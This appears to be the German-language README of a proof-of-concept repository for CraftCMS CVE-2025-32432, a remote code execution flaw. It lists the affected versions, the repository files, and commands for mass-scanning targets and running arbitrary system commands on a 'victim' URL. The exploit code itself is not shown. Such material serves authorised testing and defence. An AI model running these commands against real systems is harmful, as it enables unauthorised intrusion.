
CraftCMS CVE-2025-32432 - Sauberer PoC
Bereinigte und verbesserte Version des ursprünglichen Proof of Concept.
Dieses Projekt steht unter der MIT-Lizenz.
Siehe Datei LICENSE für weitere Details.
Dieser PoC wird ausschließlich zu Bildungszwecken und für autorisierte Tests (CTF, Sicherheitsaudits mit ausdrücklicher schriftlicher Genehmigung) bereitgestellt.
Jegliche Nutzung auf Systemen ohne Autorisierung ist illegal. Der Autor übernimmt keine Haftung für missbräuchliche Verwendung.
< 3.9.15< 4.14.15< 5.6.17craftcms-cve-2025-32432-poc/
├── craftcms_rce_php_check.py
├── craftcms_final_payload.py
├── requirements.txt
├── README.md
├── LICENSE
└── .gitignore
git clone https://github.com/n40y/craftcms-cve-2025-32432-poc.git
cd craftcms-cve-2025-32432-poc
pip3 install -r requirements.txt
python3 craftcms_rce_php_check.py -u https://target.com
# Ou avec une liste
python3 craftcms_rce_php_check.py -f urls.txt -t 10
python3 craftcms_final_payload.py -u https://victim.com -c "id"
-u, --url → URL cible (obligatoire)
-c, --cmd → Commande système à exécuter (obligatoire)
-a, --asset → AssetId valide connu (optionnel)
-s, --scan-max → Max assetId à scanner (défaut: 300)